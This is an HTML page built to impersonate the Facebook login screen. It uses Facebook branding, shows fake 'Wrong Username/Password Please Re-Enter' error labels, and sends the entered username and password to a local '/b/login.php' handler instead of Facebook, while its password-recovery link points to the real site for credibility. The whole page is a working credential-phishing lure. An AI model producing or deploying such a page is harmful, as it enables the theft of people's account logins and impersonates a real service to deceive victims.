

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
header {
  background-color:#04267B;
  padding-top: 5px;
  text-align: left;
  font-size: 35px;
  color: white;
}
body {font-family: Arial, Helvetica, sans-serif; background-color: #e9ebee; padding: 22px 108px;}
form {background-color: white;}

input[type=text], input[type=password] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box;
}

button {
  background-color: #4267b2;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
}

button:hover {
  opacity: 0.8;
}

.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #f44336;
}

.imgcontainer {
  text-align: center;
  margin: 24px 0 12px 0;
}

img.avatar {
  width: 40%;
  border-radius: 50%;
}

.container {
  padding: 16px;
}

span.psw {
  float: right;
  padding-top: 0.5px;
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  .cancelbtn {
     width: 100%;
  }
}
</style>
</head>
<body style="
    padding-top: 0px;
    padding-left: 0px;
    padding-bottom: 0px;
    padding-right: 0px;
">
<header>
  <img src="facebook.png" alt="Facebook" width="220px" height="50.625px" 
"> 
</header>
<form action="/b/login.php" method="post">
  <div class="imgcontainer">
   <h3> Log into facebook </h3>
  </div>

  <div class="container">
    <label for="uname"><b style="color:red">Wrong Username Please Re-Enter.</b>    </label>
    <input type="text" placeholder="Enter Username" name="uname" required>

    <label for="psw"><b style="color:red">Wrong Password Please Re-Enter.</b></label>
    <input type="password" placeholder="Enter Password" name="psw" required>
        
    <button type="submit">Login</button>
    <label>
      <input type="checkbox" checked="checked" name="remember"> Remember me
    </label>
  </div>

  <div class="container" style="background-color:#f1f1f1">
    
    <span class="psw">Forgot <a href="https://www.facebook.com/login/identify/?ctx=recover">password?</a></span>
  </div>
</form>

</body>
</html>